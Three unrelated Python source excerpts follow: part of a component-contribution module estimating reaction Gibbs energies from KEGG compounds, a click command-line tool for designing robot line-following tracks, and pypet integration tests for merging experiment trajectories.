            # are not supported.
            self.phase = DEFAULT_PHASE
            for sp in self.species_list:
                if sp.phase != DEFAULT_PHASE:
                    if len(self.species_list) > 1:
                        raise ValueError('compound in non-aqueous phase must '
                                         'have only one species')
                    self.phase = sp.phase

    def get_stoich_vector(self, Nc):
        """Return an Nc x 1 indicator vector with 1 at this compound's index."""
        vec = matrix(zeros((Nc, 1)))
        idx = self.compound_index
        if idx is None:
            raise Exception('could not find index for ' + self.kegg_id)
        vec[idx, 0] = 1
        return vec

    def get_group_incidence_vector(self, Ng):
        """Return an Ng x 1 vector of group counts from the group vector."""
        incidence = matrix(zeros((Ng, 1)))
        if self.group_vector is None:
            raise Exception('could not find group vector for ' + self.kegg_id)
        for g_ind, g_count in self.group_vector:
            incidence[g_ind, 0] += g_count
        return incidence

    def dG0_prime(self, pH, pMg, I):
        """
        Get a delta-deltaG estimate for this group of species.
        I.e., this is the difference between the dG0 and the dG'0, which
        only depends on the pKa of the pseudoisomers, but not on their
        formation energies.
        Args:
            pH - the pH to estimate at.
            pMg - the pMg to estimate at.
            I - the ionic strength to estimate at.
        Returns:
            The estimated delta G in the given conditions or None.
        """
        if self.phase == DEFAULT_PHASE:
            # Compute per-species transforms, scaled down by R*T.
            per_species = array(map(lambda sp: sp.dG0_prime(pH, pMg, I),
                                    self.species_list))
            # Numerical issues: taking a sum of exp(v) for |v| quite large.
            # Use the fact that we take a log later to offset all values by a
            # constant (the minimum value).
            dG0_f_prime = -RT * logaddexp.reduce((-1.0 / RT) * per_species)
        else:
            # Non-aqueous compounds have exactly one species (see __init__).
            dG0_f_prime = self.species_list[0].dG0_prime(pH, pMg, I)
        logging.info('KEGG_ID = %s, dG\'0_f = %.1f' % (self.kegg_id, dG0_f_prime))
        return dG0_f_prime
class Reaction(object):
    """A chemical reaction expressed as KEGG compound IDs -> stoichiometric
    coefficients (negative = substrate, positive = product).

    NOTE: Python 2 only — uses dict.iteritems() and reads the gzipped JSON
    file in text mode at class-definition time.
    """
    # load formation energies from the JSON file
    # (executed once, when the class is defined; requires
    # COMPOUND_JSON_FNAME to exist in the working directory)
    COMPOUND_DICT = {}
    for cd in json.load(gzip.open(COMPOUND_JSON_FNAME, 'r')):
        kegg_id = cd.get('CID', 'unknown')
        COMPOUND_DICT[kegg_id] = cd

    def __init__(self, kegg_id_to_coeff):
        # Mapping KEGG compound ID -> stoichiometric coefficient.
        self.kegg_id_to_coeff = kegg_id_to_coeff

        # Create the relevant "Compound" objects and store in a dictionary
        self.kegg_id_to_compound = {}
        for kegg_id in self.kegg_id_to_coeff.keys():
            compound = Compound(Reaction.COMPOUND_DICT[kegg_id])
            self.kegg_id_to_compound[kegg_id] = compound

    def kegg_ids(self):
        """Return the KEGG IDs participating in this reaction."""
        return self.kegg_id_to_coeff.keys()

    def get_coeff(self, kegg_id):
        """Return the stoichiometric coefficient of kegg_id (0 if absent)."""
        return self.kegg_id_to_coeff.get(kegg_id, 0)

    def get_compound(self, kegg_id):
        """Return the Compound object for kegg_id (None if absent)."""
        return self.kegg_id_to_compound.get(kegg_id, None)

    def dG0_prime(self, pH, pMg, I):
        """Return the transformed reaction energy: the coefficient-weighted
        sum of the per-compound dG'0 values at the given conditions."""
        dG0_r_prime = 0
        for kegg_id in self.kegg_ids():
            coeff = self.get_coeff(kegg_id)
            compound = self.get_compound(kegg_id)
            dG0_r_prime += coeff * compound.dG0_prime(pH, pMg, I)
        return dG0_r_prime

    @staticmethod
    def parse_reaction_formula_side(s):
        """
        Parses the side formula, e.g. '2 C00001 + C00002 + 3 C00003'
        Returns:
            A dict mapping CID -> stoichiometric amount (floats; a missing
            amount defaults to 1). Returns {} for the literal side "null".
        """
        if s.strip() == "null":
            return {}
        compound_bag = {}
        for member in re.split('\s+\+\s+', s):
            tokens = member.split(None, 1)
            if len(tokens) == 0:
                continue
            if len(tokens) == 1:
                amount = 1
                key = member
            else:
                amount = float(tokens[0])
                key = tokens[1]
            compound_bag[key] = compound_bag.get(key, 0) + amount
        return compound_bag

    @staticmethod
    def parse_formula(formula, arrow='='):
        """
        Parses a two-sided formula such as: 2 C00001 => C00002 + C00003
        Return:
            A Reaction whose sparse map has negative coefficients for the
            left side (substrates) and positive for the right (products).
        Raises ValueError if the arrow is missing or appears more than once.
        """
        tokens = formula.split(arrow)
        if len(tokens) < 2:
            raise ValueError('Reaction does not contain the arrow sign (%s): %s'
                             % (arrow, formula))
        if len(tokens) > 2:
            raise ValueError('Reaction contains more than one arrow sign (%s): %s'
                             % (arrow, formula))
        left = tokens[0].strip()
        right = tokens[1].strip()
        sparse_reaction = {}
        # Python 2 dict iteration; substrates subtract, products add.
        for cid, count in Reaction.parse_reaction_formula_side(left).iteritems():
            sparse_reaction[cid] = sparse_reaction.get(cid, 0) - count
        for cid, count in Reaction.parse_reaction_formula_side(right).iteritems():
            sparse_reaction[cid] = sparse_reaction.get(cid, 0) + count
        return Reaction(sparse_reaction)
class Preprocessing(object):
    """Component-contribution preprocessing data.

    Loads the pre-computed matrices used to estimate standard transformed
    reaction Gibbs energies (dG'0) together with their uncertainty, and
    provides helpers mapping reactions onto the training-set stoichiometric
    space (X) and the group-incidence space (G).
    """

    def __init__(self):
        # load pre-processing matrices (for the uncertainty estimation)
        relpath = os.path.dirname(os.path.realpath(__file__))
        cc_preprocess_fname = os.path.join(relpath, PREPROCESS_FNAME)
        cc_preprocess = load(cc_preprocess_fname)
        self.v_r = matrix(cc_preprocess['v_r'])
        self.v_g = matrix(cc_preprocess['v_g'])
        self.C1 = matrix(cc_preprocess['C1'])
        self.C2 = matrix(cc_preprocess['C2'])
        self.C3 = matrix(cc_preprocess['C3'])
        self.G1 = matrix(cc_preprocess['G1'])
        self.G2 = matrix(cc_preprocess['G2'])
        self.G3 = matrix(cc_preprocess['G3'])
        self.S = matrix(cc_preprocess['S'])
        self.kegg_ids = cc_preprocess['cids']
        # Nc: number of compounds in the CC training set,
        # Ng: number of chemical groups.
        self.Nc = self.C1.shape[0]
        self.Ng = self.C3.shape[0]
        # Sanity-check the covariance block dimensions (C1, C3 square and
        # C2 compatible with both).  A duplicated assert was removed here.
        assert self.C1.shape[0] == self.C1.shape[1]
        assert self.C1.shape[1] == self.C2.shape[0]
        assert self.C2.shape[1] == self.C3.shape[0]
        assert self.C3.shape[0] == self.C3.shape[1]

    def reaction_to_vectors(self, reaction):
        """Return the pair (x, g) of column vectors for one reaction."""
        # x is the stoichiometric vector of the reaction, only for the
        # compounds that appeared in the original training set for CC
        x = matrix(zeros((self.Nc, 1)))
        # g is the group incidence vector of all the other compounds
        g = matrix(zeros((self.Ng, 1)))
        for kegg_id in reaction.kegg_ids():
            coeff = reaction.get_coeff(kegg_id)
            compound = reaction.get_compound(kegg_id)
            x += coeff * compound.get_stoich_vector(self.Nc)
            g += coeff * compound.get_group_incidence_vector(self.Ng)
        return x, g

    def reactions_to_matrices(self, reactions):
        """
        Arguments:
            reactions - a list of KeggReaction objects
        Returns:
            X - the stoichiometric matrix of the reactions (only
                for compounds that appear in the original training
                set of CC)
            G - the group incidence matrix (of all other compounds)
        """
        X = matrix(zeros((self.Nc, len(reactions))))
        G = matrix(zeros((self.Ng, len(reactions))))
        for i, reaction in enumerate(reactions):
            x, g = self.reaction_to_vectors(reaction)
            X[:, i] = x
            G[:, i] = g
        return X, G

    def dG0_prime(self, reactions, pH=DEFAULT_PH, pMg=DEFAULT_PMG,
                  I=DEFAULT_IONIC_STRENGTH):
        """Estimate dG'0 and its covariance U for a reaction or list thereof."""
        # Accept a single reaction for convenience (isinstance instead of the
        # deprecated types.ListType comparison).
        if not isinstance(reactions, list):
            reactions = [reactions]
        dG0_r_prime = matrix([r.dG0_prime(pH, pMg, I) for r in reactions]).T
        X, G = self.reactions_to_matrices(reactions)
        # Covariance of the estimates: U = [X; G]^T * C * [X; G].
        U = X.T * self.C1 * X + \
            X.T * self.C2 * G + \
            G.T * self.C2.T * X + \
            G.T * self.C3 * G
        return dG0_r_prime, U

    @staticmethod
    def WriteCompoundAndCoeff(kegg_id, coeff):
        """Format one compound, omitting a coefficient of exactly 1."""
        if coeff == 1:
            return kegg_id
        else:
            return "%g %s" % (coeff, kegg_id)

    @staticmethod
    def DictToReactionString(d):
        """String representation of a sparse reaction dict."""
        left = []
        right = []
        for kegg_id, coeff in sorted(d.items()):
            if coeff < 0:
                # Substrates are written with their positive magnitude.
                left.append(Preprocessing.WriteCompoundAndCoeff(kegg_id, -coeff))
            elif coeff > 0:
                # BUG FIX: products previously also used -coeff and were
                # rendered with a spurious negative coefficient.
                right.append(Preprocessing.WriteCompoundAndCoeff(kegg_id, coeff))
        return "%s %s %s" % (' + '.join(left), '<=>', ' + '.join(right))

    def Analyze(self, x, g):
        """Break an estimate down into per-training-reaction weights.

        BUG FIX: this method was decorated with @staticmethod while still
        taking `self` and reading instance state (G1, G2, G3, S, kegg_ids),
        so every call failed; it is an ordinary instance method.

        Returns a list of dicts sorted by decreasing |weight|.
        """
        weights_rc = x.T * self.G1
        weights_gc = x.T * self.G2 + g.T * self.G3
        weights = weights_rc + weights_gc
        res = []
        for j in range(self.S.shape[1]):
            d = {self.kegg_ids[i]: self.S[i, j]
                 for i in range(self.Nc)
                 if self.S[i, j] != 0}
            r_string = self.DictToReactionString(d)
            res.append({'w': weights[0, j],
                        'w_rc': weights_rc[0, j].round(4),
                        'w_gc': weights_gc[0, j].round(4),
                        'reaction_string': r_string})
        res.sort(key=lambda item: abs(item['w']), reverse=True)
        return res

    def IsUsingGroupContributions(self, x, g):
        """Return True when the group-contribution weights are non-negligible."""
        weights_gc = x.T * self.G2 + g.T * self.G3
        sum_w_gc = sum(abs(weights_gc).flat)
        logging.info('sum(w_gc) = %.2g' % sum_w_gc)
        return sum_w_gc > 1e-5
if __name__ == '__main__':
    # Smoke test: loading the preprocessing matrices from disk must succeed.
    p = Preprocessing()
|
"""
Command line interface for Line Track Designer
"""
import click
from pathlib import Path
import logging
import webbrowser
from line_track_designer.track import Track
from line_track_designer.tile import Tile, Tiles
@click.group()
@click.option('-v', '--verbosity', is_flag=True, help='Set the verbosity')
def linetrack(verbosity):
    """Generate line following tracks for robots."""
    # INFO-level logging is only enabled when the -v flag is passed.
    if verbosity:
        log_format = '%(levelname)s:%(message)s'
        logging.basicConfig(format=log_format, level=logging.INFO)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def show(filename):
    """Show track FILENAME as PNG file.
    FILENAME is a text file following the track file's conventions.
    """
    # Load the track and open its rendered image in one go.
    Track.read(filename).show()
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def write(filename):
    """Write track FILENAME in the command prompt."""
    track = Track.read(filename)
    click.echo(track)
    # Fixed log message grammar ('writed' -> 'written').
    logging.info('Track written')
@linetrack.command()
@click.argument('filename', type=click.Path())
@click.argument('nrow', type=int)
@click.argument('ncol', type=int)
def create(filename, nrow, ncol):
    """Create empty track FILENAME.
    NROW is the number of rows.
    NCOL is the number of columns.
    """
    # Build an all-zero track, persist it, then open it in the user's editor.
    empty_track = Track.zeros(nrow, ncol)
    empty_track.save_txt(filename)
    click.edit(filename=filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def edit(filename):
    """Edit track FILENAME."""
    # Report which file is opened, then hand off to the user's editor.
    msg = 'Editing track: {}'.format(filename)
    logging.info(msg)
    click.edit(filename=filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def addcol(filename):
    """Add a column to track FILENAME."""
    # Load, mutate in memory, and write back in place.
    modified = Track.read(filename)
    modified.add_col()
    modified.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def addrow(filename):
    """Add a row to track FILENAME."""
    # Load, mutate in memory, and write back in place.
    modified = Track.read(filename)
    modified.add_row()
    modified.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.argument('col', type=int)
def delcol(filename, col):
    """Delete column COL from track FILENAME.
    COL is the number of the column to delete.
    """
    # Remove the requested column and overwrite the original file.
    modified = Track.read(filename)
    modified.del_col(col)
    modified.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.argument('row', type=int)
def delrow(filename, row):
    """Delete row ROW from track FILENAME.
    ROW is the number of the row to delete.
    """
    # Remove the requested row and overwrite the original file.
    modified = Track.read(filename)
    modified.del_row(row)
    modified.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.option('-n', default=1, help='Number of rotations')
def rotate(filename, n):
    """Rotate track FILENAME."""
    # Apply n quarter-turn rotations and save the result in place.
    rotated = Track.read(filename)
    rotated.rotate(n)
    rotated.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.option('-o', '--output', 'filename_png', default='',
              help='Name of the PNG file')
@click.option('-s', '--show', is_flag=True, help='Show the file created')
def savepng(filename, filename_png, show):
    """Save track FILENAME as PNG file."""
    track = Track.read(filename)
    # Default the output name to the input path with a .png suffix.
    if not filename_png:
        filename_png = Path(filename).with_suffix('.png')
    track.save_img(filename_png)
    if show:
        track.show()
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.option('-o', '--output', 'filename_md', default='',
              help='Name of the MD file')
@click.option('-n', '--name', 'name', default='Track',
              prompt='Name', help='Name of the track')
@click.option('-d', '--description', 'description', default='',
              prompt='Description', help='Description of the track')
def savemd(filename, filename_md, name, description):
    """Save track FILENAME as MD file."""
    track = Track.read(filename, name)
    # Default the output name to the input path with a .md suffix.
    if not filename_md:
        filename_md = Path(filename).with_suffix('.md')
    track.save_md(filename_md, description)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def printing(filename):
    """Print track FILENAME."""
    # Ask for confirmation before sending anything to the printer.
    if not click.confirm('Do you want to print the track?'):
        return
    Track.read(filename).print_track()
@linetrack.command()
@click.argument('number', type=int)
@click.option('-o', '--orient', default=0, help='Orientation')
def showtile(number, orient):
    """Show tile NUMBER."""
    # Render a single tile image at the requested orientation.
    t = Tile(number)
    t.show(orient)
@linetrack.command()
def pdf():
    """Open the PDF file containing the tiles."""
    # The Tiles helper knows where the bundled PDF lives.
    Tiles.show()
@linetrack.command()
def doc():
    """Open the documentation."""
    # Opens the hosted documentation in the default web browser.
    webbrowser.open('https://line-track-designer.readthedocs.io/en/latest/')
    logging.info('Doc opened')
|
__author__ = '<NAME>'
import numpy as np
from pypet.parameter import Parameter
from pypet.utils.explore import cartesian_product
from pypet.environment import Environment
from pypet import pypetconstants
import logging
import os
import time
from scipy.stats import pearsonr
from pypet.tests.testutils.ioutils import run_suite, make_temp_dir, make_trajectory_name, \
parse_args, get_log_config
from pypet.tests.testutils.data import add_params, simple_calculations, TrajectoryComparator,\
multiply, create_param_dict
from pypet.tests.integration.environment_test import ResultSortTest, my_set_func, my_run_func
from pypet import merge_all_in_folder
class MergeTest(TrajectoryComparator):
    """Integration tests for the many variants of pypet trajectory merging:
    same vs. separate HDF5 files, trial parameters, duplicate removal,
    backups, and error conditions."""

    tags = 'integration', 'hdf5', 'environment', 'merge'

    def tearDown(self):
        # Shut down logging of every environment created by a test before
        # the comparator's own cleanup runs.
        if hasattr(self, 'envs'):
            for env in self.envs:
                env.f_disable_logging()
        super(MergeTest, self).tearDown()

    def make_run(self, env):
        ### Make a test run
        simple_arg = -13
        simple_kwarg = 13.0
        env.f_run(simple_calculations, simple_arg, simple_kwarg=simple_kwarg)

    def make_environment(self, idx, filename, **kwargs):
        """Create an Environment writing to `filename` and record both the
        environment and its trajectory in self.envs / self.trajs."""
        #self.filename = make_temp_dir('experiments/tests/HDF5/test.hdf5')
        logfolder = make_temp_dir(os.path.join('experiments', 'tests', 'Log'))
        trajname = make_trajectory_name(self) + '__' + str(idx) + '_'
        env = Environment(trajectory=trajname, filename=filename, file_title=trajname,
                          log_stdout=False,
                          large_overview_tables=True, log_config=get_log_config(),
                          **kwargs)
        self.envs.append(env)
        self.trajs.append(env.v_trajectory)

    def test_merging_trajectories_in_different_subspace(self):
        """Trajectories explored in different parameter subspaces merge into
        the union of both subspaces (compared against a reference)."""
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge_diff_subspace.hdf5')), 0, 0]
        self.envs = []
        self.trajs = []
        # An integer entry in self.filenames means "reuse the file at that index".
        for irun, filename in enumerate(self.filenames):
            if isinstance(filename, int):
                filename = self.filenames[filename]
            self.make_environment(irun, filename, wildcard_functions=
                {('$', 'crun'): my_run_func, ('$set', 'crunset'): my_set_func})
        self.param_dict = {}
        create_param_dict(self.param_dict)
        for irun in [0, 1, 2]:
            add_params(self.trajs[irun], self.param_dict)
        self.explore(self.trajs[0])
        self.explore2(self.trajs[1])
        self.compare_explore_diff_subspace(self.trajs[2])
        for irun in [0, 1, 2]:
            self.make_run(self.envs[irun])
        for irun in [0, 1, 2]:
            self.trajs[irun].f_load_skeleton()
            self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
                                    load_derived_parameters=pypetconstants.UPDATE_DATA,
                                    load_results=pypetconstants.UPDATE_DATA,
                                    load_other_data=pypetconstants.UPDATE_DATA)
        self.trajs[1].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
        self.trajs[2].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
        ##f_merge without destroying the original trajectory
        merged_traj = self.trajs[0]
        merged_traj.f_merge(self.trajs[1], move_data=True,
                            delete_other_trajectory=True)
        merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
                           load_derived_parameters=pypetconstants.UPDATE_DATA,
                           load_results=pypetconstants.UPDATE_DATA,
                           load_other_data=pypetconstants.UPDATE_DATA)
        self.compare_trajectories(merged_traj, self.trajs[2])

    def test_merging_errors_if_trajs_do_not_match(self):
        """Merging must raise TypeError when parameters differ in presence or
        in type; it succeeds once the values are made type-compatible."""
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge_errors.hdf5')), 0]
        self.envs = []
        self.trajs = []
        for irun, filename in enumerate(self.filenames):
            if isinstance(filename, int):
                filename = self.filenames[filename]
            self.make_environment(irun, filename)
        self.param_dict = {}
        create_param_dict(self.param_dict)
        for irun in [0, 1]:
            add_params(self.trajs[irun], self.param_dict)
        self.explore(self.trajs[0])
        self.explore(self.trajs[1])
        for irun in [0, 1]:
            self.make_run(self.envs[irun])
        for irun in [0, 1]:
            self.trajs[irun].f_load_skeleton()
            self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
                                    load_derived_parameters=pypetconstants.UPDATE_DATA,
                                    load_results=pypetconstants.UPDATE_DATA,
                                    load_other_data=pypetconstants.UPDATE_DATA)
        self.trajs[0].f_add_parameter('Merging.Denied', 13)
        ##f_merge without destroying the original trajectory
        merged_traj = self.trajs[0]
        # We cannot merge trajectories which parameters differ
        with self.assertRaises(TypeError):
            merged_traj.f_merge(self.trajs[1])
        self.trajs[1].f_add_parameter('Merging.Denied', 13.13)
        # We cannot merge trajectories where parameters differ in type
        with self.assertRaises(TypeError):
            merged_traj.f_merge(self.trajs[1])
        self.trajs[1].f_get('Denied').f_unlock()
        self.trajs[1].f_get('Denied').f_set(15)
        merged_traj.f_merge(self.trajs[1])

    def test_merge_basic_within_same_file_only_adding_more_trials_copy_nodes(self):
        # Same HDF5 file for all three trajectories, copying nodes.
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge1.hdf5')), 0, 0]
        self.merge_basic_only_adding_more_trials(True)

    def test_merge_basic_within_same_file_only_adding_more_trials_move_nodes(self):
        # Same HDF5 file for all three trajectories, moving nodes.
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge1.hdf5')), 0, 0]
        self.merge_basic_only_adding_more_trials(False)

    def test_basic_within_same_file_and_skipping_duplicates_which_will_be_all(self):
        # Every run is a duplicate, so the merge must fail with ValueError.
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge1.hdf5')), 0]
        with self.assertRaises(ValueError):
            self.basic_and_skipping_duplicates_which_will_be_all()

    def test_basic_within_same_file_and_skipping_duplicates_which_leads_to_one_reamianing(self):
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge1_one_remaining.hdf5')), 0, 0]
        self.basic_and_skipping_duplicates_which_leads_to_one_remaining()

    def test_basic_within_separate_file_and_skipping_duplicates_which_leads_to_one_reamianing(self):
        # Same scenario as above but each trajectory lives in its own file.
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge2_one_remaining.hdf5')),
                          make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge3_one_remaining.hdf5')),
                          make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge4_one_remaining.hdf5'))]
        self.basic_and_skipping_duplicates_which_leads_to_one_remaining()

    def test_merge_basic_with_separate_files_only_adding_more_trials(self):
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge2trials.hdf5')),
                          make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge3trials.hdf5')),
                          make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge4trials.hdf5'))]
        self.merge_basic_only_adding_more_trials(True)

    def test_merge_basic_with_separate_files_only_adding_more_trials_slow_merge(self):
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'slow_merge2.hdf5')),
                          make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'slow_merge3.hdf5')),
                          make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'slow_merge4.hdf5'))]
        self.merge_basic_only_adding_more_trials(True, slow_merge=True)

    def test_merge_basic_within_same_file_only_adding_more_trials_copy_nodes_test_backup(self):
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge1_more_trials.hdf5')), 0, 0]
        self.merge_basic_only_adding_more_trials_with_backup(True)

    def test_merge_basic_within_same_file_only_adding_more_trials_delete_other_trajectory(self):
        self.filenames = [make_temp_dir(os.path.join('experiments',
                                                     'tests',
                                                     'HDF5',
                                                     'merge1_more_trials.hdf5')), 0, 0]
        self.merge_basic_only_adding_more_trials(False, True)

    def merge_basic_only_adding_more_trials(self, copy_nodes=False, delete_traj=False,
                                            slow_merge=False):
        """Merge two explored trajectories via the 'trial' parameter and
        compare the outcome with a manually explored reference (trajs[2])."""
        self.envs = []
        self.trajs = []
        for irun, filename in enumerate(self.filenames):
            if isinstance(filename, int):
                filename = self.filenames[filename]
            self.make_environment(irun, filename)
        self.param_dict = {}
        create_param_dict(self.param_dict)
        for irun in [0, 1, 2]:
            add_params(self.trajs[irun], self.param_dict)
        self.explore(self.trajs[0])
        self.explore(self.trajs[1])
        self.compare_explore_more_trials(self.trajs[2])
        for irun in [0, 1, 2]:
            self.make_run(self.envs[irun])
        for irun in [0, 1, 2]:
            self.trajs[irun].f_load_skeleton()
            self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
                                    load_derived_parameters=pypetconstants.UPDATE_DATA,
                                    load_results=pypetconstants.UPDATE_DATA,
                                    load_other_data=pypetconstants.UPDATE_DATA)
        self.trajs[1].f_add_result('gg.rrororo33o333o3o3oo3', 1234567890)
        self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
        self.trajs[1].res.gg.v_annotations['lala'] = 'Sonnenschein'
        self.trajs[1].f_store_item('gg')
        self.trajs[2].f_add_result('gg.rrororo33o333o3o3oo3', 1234567890)
        self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
        self.trajs[2].res.gg.v_annotations['lala'] = 'Sonnenschein'
        self.trajs[2].f_store_item('gg')
        ##f_merge without destroying the original trajectory
        merged_traj = self.trajs[0]
        self.trajs[1].f_remove_child('results', recursive=True)
        merged_traj.f_merge(self.trajs[1], move_data=not copy_nodes,
                            delete_other_trajectory=delete_traj,
                            trial_parameter='trial',
                            slow_merge=slow_merge)
        merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
                           load_derived_parameters=pypetconstants.UPDATE_DATA,
                           load_results=pypetconstants.UPDATE_DATA,
                           load_other_data=pypetconstants.UPDATE_DATA)
        self.compare_trajectories(merged_traj, self.trajs[2])

    def merge_basic_only_adding_more_trials_with_backup(self, copy_nodes):
        """Like merge_basic_only_adding_more_trials, but the merge is done
        with a backup file (backup_filename=1 selects the default name)."""
        self.envs = []
        self.trajs = []
        for irun, filename in enumerate(self.filenames):
            if isinstance(filename, int):
                filename = self.filenames[filename]
            self.make_environment(irun, filename)
        self.param_dict = {}
        create_param_dict(self.param_dict)
        for irun in [0, 1, 2]:
            add_params(self.trajs[irun], self.param_dict)
        self.explore(self.trajs[0])
        self.explore(self.trajs[1])
        self.compare_explore_more_trials(self.trajs[2])
        for irun in [0, 1, 2]:
            self.make_run(self.envs[irun])
        for irun in [0, 1, 2]:
            self.trajs[irun].f_load_skeleton()
            self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
                                    load_derived_parameters=pypetconstants.UPDATE_DATA,
                                    load_results=pypetconstants.UPDATE_DATA,
                                    load_other_data=pypetconstants.UPDATE_DATA)
        self.trajs[1].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
        self.trajs[2].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
        ##f_merge without destroying the original trajectory
        merged_traj = self.trajs[0]
        merged_traj.f_merge(self.trajs[1], move_data=not copy_nodes, delete_other_trajectory=False, trial_parameter='trial',
                            backup_filename=1)
        merged_traj.f_load_skeleton()
        merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
                           load_derived_parameters=pypetconstants.UPDATE_DATA,
                           load_results=pypetconstants.UPDATE_DATA,
                           load_other_data=pypetconstants.UPDATE_DATA)
        self.compare_trajectories(merged_traj, self.trajs[2])

    def basic_and_skipping_duplicates_which_leads_to_one_remaining(self, slow_merge=False):
        """Merge with remove_duplicates=True where only one run differs;
        also exercises ignore_data for selected results/parameters."""
        self.envs = []
        self.trajs = []
        ntrajs = len(self.filenames)
        for irun, filename in enumerate(self.filenames):
            if isinstance(filename, int):
                filename = self.filenames[filename]
            self.make_environment(irun, filename)
        self.param_dict = {}
        create_param_dict(self.param_dict)
        for irun in range(ntrajs):
            add_params(self.trajs[irun], self.param_dict)
        self.explore(self.trajs[0])
        self.explore_trials_differently(self.trajs[1])
        self.compare_explore_more_trials_with_removing_duplicates(self.trajs[2])
        for irun in range(ntrajs):
            self.make_run(self.envs[irun])
        for irun in range(ntrajs):
            self.trajs[irun].f_load_skeleton()
            self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
                                    load_derived_parameters=pypetconstants.UPDATE_DATA,
                                    load_results=pypetconstants.UPDATE_DATA,
                                    load_other_data=pypetconstants.UPDATE_DATA)
        self.trajs[1].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
        self.trajs[2].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
        # Per-run results: run 1 of traj 1 should end up as run 5 after merging.
        run_name = pypetconstants.FORMATTED_RUN_NAME % 1
        run_name2 = pypetconstants.FORMATTED_RUN_NAME % 5
        self.trajs[1].f_add_result('%s.rrr' % run_name, 123)
        self.trajs[1].f_store_item('%s.rrr' % run_name)
        self.trajs[2].f_add_result('%s.rrr' % run_name2, 123)
        self.trajs[2].f_store_item('%s.rrr' % run_name2)
        # Data listed in ignore_data below must not survive the merge.
        self.trajs[1].f_add_result('Ignore.Me', 42)
        self.trajs[1].f_apar('Ignore.Me', 42)
        self.trajs[1].f_adpar('Ignore.Me', 42)
        ##f_merge without destroying the original trajectory
        merged_traj = self.trajs[0]
        merged_traj.f_merge(self.trajs[1], move_data=False,
                            delete_other_trajectory=False,
                            remove_duplicates=True,
                            ignore_data=('results.Ignore.Me', 'parameters.Ignore.Me',
                                         'derived_parameters.Ignore.Me'),
                            slow_merge=slow_merge)
        merged_traj.f_load_skeleton()
        merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
                           load_derived_parameters=pypetconstants.UPDATE_DATA,
                           load_results=pypetconstants.UPDATE_DATA,
                           load_other_data=pypetconstants.UPDATE_DATA)
        self.compare_trajectories(merged_traj, self.trajs[2])

    def basic_and_skipping_duplicates_which_will_be_all(self):
        """Merge two identically explored trajectories with
        remove_duplicates=True; the result must equal either input."""
        self.envs = []
        self.trajs = []
        for irun, filename in enumerate(self.filenames):
            if isinstance(filename, int):
                filename = self.filenames[filename]
            self.make_environment(irun, filename)
        self.param_dict = {}
        create_param_dict(self.param_dict)
        for irun in [0, 1]:
            add_params(self.trajs[irun], self.param_dict)
        self.explore(self.trajs[0])
        self.explore(self.trajs[1])
        for irun in [0, 1]:
            self.make_run(self.envs[irun])
        for irun in [0, 1]:
            self.trajs[irun].f_load_skeleton()
            self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
                                    load_derived_parameters=pypetconstants.UPDATE_DATA,
                                    load_results=pypetconstants.UPDATE_DATA,
                                    load_other_data=pypetconstants.UPDATE_DATA)
